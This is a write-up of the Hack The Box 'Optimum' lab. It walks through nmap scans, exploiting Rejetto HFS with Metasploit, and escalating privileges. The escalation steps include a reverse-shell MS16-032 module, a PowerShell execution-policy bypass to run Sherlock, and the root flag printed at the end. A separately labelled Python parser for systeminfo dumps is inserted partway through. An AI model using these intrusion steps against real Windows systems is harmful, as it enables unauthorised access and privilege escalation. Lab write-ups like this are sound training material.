This is my approach to solving HTB’s Optimum CTF

 

JOURNEY TO OSCP
Optimum
OS: Windows
Difficulty: Easy
Points: 20
Release: 18 Mar 2017
IP: 10.13.10.8

 

NMAP:

UDP Scan:

Scanned at 2021-04-22 ... EDT for 351s
PORT       STATE          SERVICE       REASON                               VERSION
53/udp     filtered       domain        host-unreach from 10.10.14.1 ttl 64
67/udp     open|filtered  dhcps         no-response
68/udp     open|filtered  dhcpc         no-response
69/udp     open|filtered  tftp          no-response
123/udp    open|filtered  ntp           no-response
135/udp    filtered       msrpc         host-unreach from 10.10.14.1 ttl 64
137/udp    filtered       netbios-ns    host-unreach from 10.10.14.1 ttl 64
138/udp    filtered       netbios-dgm   host-unreach from 10.10.14.1 ttl 64
139/udp    filtered       netbios-ssn   host-unreach from 10.10.14.1 ttl 64
161/udp    open|filtered  snmp          no-response
162/udp    open|filtered  snmptrap      no-response
445/udp    filtered       microsoft-ds  host-unreach from 10.10.14.1 ttl 64
500/udp    open|filtered  isakmp        no-response
514/udp    open|filtered  syslog        no-response
520/udp    filtered       route         host-unreach from 10.10.14.1 ttl 64
631/udp    open|filtered  ipp           no-response
1434/udp   open|filtered  ms-sql-m      no-response
1900/udp   open|filtered  upnp          no-response
4500/udp   filtered       nat-t-ike     host-unreach from 10.10.14.1 ttl 64
49152/udp  filtered       unknown       host-unreach from 10.10.14.1 ttl 64
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
OS:SCAN(... -pc-linux-gnu ...)

TRACEROUTE (using port 137/udp)
HOP RTT        ADDRESS
1   ... ms     10.10.14.1
2   128.72 ms  ...

Nothing usable here. Note the REASON column: every "filtered" row is an ICMP host-unreachable that came from 10.10.14.1 (the VPN gateway), not from the target, so those rows say nothing about the box itself; the "open|filtered" rows simply got no reply at all. The TCP scan is what matters.

 

TCP:

HFS 2.3:

Looking at the website I see Rejetto HFS, so I put rejetto into searchsploit:

I also go to Google and get these results:

I see both a manual exploit and a Metasploit point of attack.

I try both, for OSCP practice.

 

 

Metasploit:

Sysinfo:

meterpreter > pwd
C:\Users\kostas\Desktop
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language :
Domain          : HTB
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

 

So I have a 64-bit architecture, which is where I would like to be.

Getuid:

meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >

 

The getuid is kostas, so I'm going to have to do some privilege escalation.

I'm going to background this session and go to the suggester:

I'm going to use post/multi/recon/local_exploit_suggester:

Choose options, set session to 1 and then run it:

***Fun Fact*** on 64-bit machines it's not easy to get many exploits from the local exploit suggester.

 

Unfortunately nothing came through:

msf post(multi/recon/local_exploit_suggester) > run
Collecting local exploits for x64/windows...
16 exploit checks are being tried...
Post module execution completed
msf post(multi/recon/local_exploit_suggester) >

 

So now that means I'll have to do some manual exploitation.

Manual Exploitation:

To help my manual enumeration of the system I'm choosing:

Sherlock by rasta-mouse

Or I could go back to my meterpreter session and get information:

 

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language :
Domain          : HTB
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

 

And put this information into Google:

Looking at Exploit-DB I see that there is a PowerShell Invoke script for MS16-032:

So I go back to Metasploit, background the session and search for ms16-032:

meterpreter > backgroud
[-] Unknown command: backgroud.
meterpreter > background
Backgrounding session 1.
msf post(multi/recon/local_exploit_suggester) > search ms16-032
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                                           Disclosure Date  Rank    Description
   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  MS16-032 Secondary Logon Handle Privilege Escalation

 

I set the session and then the target to 1 (Windows x64):

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   0   Windows x86

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show targets

Exploit targets:

   Id  Name
   0   Windows x86
   1   Windows x64

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set target 1
target => 1

 

Set LHOST and LPORT and run the module.

***Note*** this script doesn't always want to run, so fingers crossed:

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost tun0
lhost => tun0
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 443
lport => 443
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

Started reverse TCP handler on ...
Writing payload file, ...txt...
Compressing script contents...
Compressed size: 3601
Executing exploit script...

 

No dice:

Started reverse TCP handler on ...
Writing payload file, ...txt...
Compressing script contents...
Compressed size: 3601
Executing exploit script...
Cleaned up ...txt
Exploit completed, but no session was created.
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >

 

So now I have to truly try a more manual approach.

Sherlock:

Go back to the Sherlock site, copy the "Sherlock.ps1" code into a text file and call it whatever you like.

Then go back to Metasploit and type in sessions 1:

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > sessions 1
Starting interaction with 1...
meterpreter >

And type in "shell":

meterpreter > shell
Process 2492 created.
Channel 4 created.
Microsoft Windows [Version ...]
(c) 2013 Microsoft Corporation. All rights reserved.

 

Now go back to the terminal where you saved the Sherlock code and start a Python web server in that directory:

Go back to Metasploit and use certutil to pull the file over:

Do "dir" to make sure the file made it over:

C:\Users\kostas\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is ...

 Directory of C:\Users\kostas\Desktop

<DIR>          .
<DIR>          ..
               CvtPer.txt
               hfs.exe
               sherd.ps1
            32 user.txt.txt
               4 File(s)        778.618 bytes
               ... bytes free

C:\Users\kostas\Desktop>

Now I'm going to execute the file (I saved Sherlock as sherd.ps1):

powershell.exe -exec bypass -Command "& {Import-Module .\sherd.ps1; Find-AllVulns}"

 

As it's running it shows what is vulnerable and what is not:

Something else I'm going to do:

Go to Windows Exploit Suggester and clone the code from GitHub.

Make sure to update it: python windows-exploit-suggester.py --update

So before running Windows Exploit Suggester, go back to Metasploit and type in "systeminfo".

Copy the output and place it in a text file; you can call it whatever you want, but my file is called "sysinfo.txt".
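Windows Exploit Suggester works from that sysinfo.txt: it reads the OS name and version, the architecture and the list of installed KBs, and diffs the KB list against its bulletin database. When the dump is truncated, wrapped by the terminal, or saved in an encoding the tool does not expect, it either fails or reports every bulletin as unpatched, which is the noisy result people give up on. As an added example (mine, not the post's and not part of the windows-exploit-suggester project), this parser pulls out exactly those fields so you can see what the tool will be working with before you run it. The systeminfo sample is constructed: the OS and build lines follow the post's sysinfo output, but the KB numbers and the NIC are placeholders, not this box's real list.

```python
#!/usr/bin/env python3
"""Extract the fields Windows Exploit Suggester keys on from a saved `systeminfo` dump.

Added example, not part of the post or of windows-exploit-suggester.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample: OS/build follow the post's sysinfo (2012 R2, build 9600);
# the KB numbers and NIC are placeholders, not the real box's list.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
BUILD_RE = re.compile(r"Build\s+(\d+)")


@dataclass
class SystemInfo:
    os_name: str = ""
    os_version: str = ""
    system_type: str = ""
    hotfixes: List[str] = field(default_factory=list)


def load_systeminfo(path: str) -> str:
    """Read a dump however it was captured: PowerShell redirection writes
    UTF-16LE with a BOM, cmd.exe writes the OEM code page, and a paste into a
    Linux editor (what the post does) is plain text."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_systeminfo(text: str) -> SystemInfo:
    """Walk the dump line by line; KB entries are the indented lines that
    follow the 'Hotfix(s):' header and stop at the next unindented key."""
    info = SystemInfo()
    in_hotfixes = False
    for line in text.splitlines():
        if in_hotfixes and line[:1].isspace():
            m = KB_RE.search(line)
            if m:
                info.hotfixes.append(m.group(1).upper())
            continue
        in_hotfixes = False  # any unindented line ends the hotfix section
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "OS Name":
            info.os_name = value
        elif key == "OS Version":
            info.os_version = value
        elif key == "System Type":
            info.system_type = value
        elif key.startswith("Hotfix"):
            in_hotfixes = True
    return info


def build_number(info: SystemInfo) -> int:
    m = BUILD_RE.search(info.os_version)
    return int(m.group(1)) if m else 0


def missing_hotfixes(info: SystemInfo, required: List[str]) -> List[str]:
    """KBs from `required` that are not installed: the membership test the
    suggester performs for each bulletin that applies to this OS."""
    installed = {kb.upper() for kb in info.hotfixes}
    return [kb for kb in required if kb.upper() not in installed]


if __name__ == "__main__":
    import sys
    text = load_systeminfo(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SYSTEMINFO
    info = parse_systeminfo(text)
    print(f"{info.os_name} / {info.os_version} / {info.system_type} (build {build_number(info)})")
    print(f"{len(info.hotfixes)} hotfix(es): {', '.join(info.hotfixes) or 'none found'}")
    if not info.hotfixes:
        print("warning: no KB entries parsed; check the dump before trusting the suggester's output")
```

Run it as `python3 sysinfo_check.py sysinfo.txt`. If the OS line or the hotfix list comes back empty, fix the dump (re-capture it in one piece, or re-save it as plain text) before feeding it to windows-exploit-suggester with `--systeminfo sysinfo.txt`.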

 

 

User.txt:

With all this stuff going on, I forgot to look for the user.txt file; here it is below:

C:\Users\kostas\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\kostas\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is ...

 Directory of C:\Users\kostas\Desktop

<DIR>          .
<DIR>          ..
               CvtPer.txt
               hfs.exe
               sherd.ps1
            32 user.txt.txt
               4 File(s)        778.618 bytes
               ... bytes free

C:\Users\kostas\Desktop>type user.txt.txt

 

 

I'm not going to lie, since I couldn't get Windows Exploit Suggester to work I went to look at walkthroughs.

I found: https://www.exploit-db.com/exploits/41020

 

 

After all that:

C:\Users>cd Administrator

C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is ...

 Directory of C:\Users\Administrator

18/03/2017  02:52    <DIR>          .
18/03/2017  02:52    <DIR>          ..
18/03/2017  02:52    <DIR>          Contacts
18/03/2017  03:14    <DIR>          Desktop
18/03/2017  02:52    <DIR>          Documents
18/03/2017  02:52    <DIR>          Downloads
18/03/2017  02:52    <DIR>          Favorites
18/03/2017  02:52    <DIR>          Links
18/03/2017  02:52    <DIR>          Music
18/03/2017  02:52    <DIR>          Pictures
18/03/2017  02:52    <DIR>          Saved Games
18/03/2017  02:52    <DIR>          Searches
18/03/2017  02:52    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  31.898.673.152 bytes free

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is ...

 Directory of C:\Users\Administrator\Desktop

18/03/2017  03:14    <DIR>          .
18/03/2017  03:14    <DIR>          ..
18/03/2017  03:14                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  31.898.673.152 bytes free

C:\Users\Administrator\Desktop>type root.txt
51ed1b36553c8461f4552c2e92b3eeed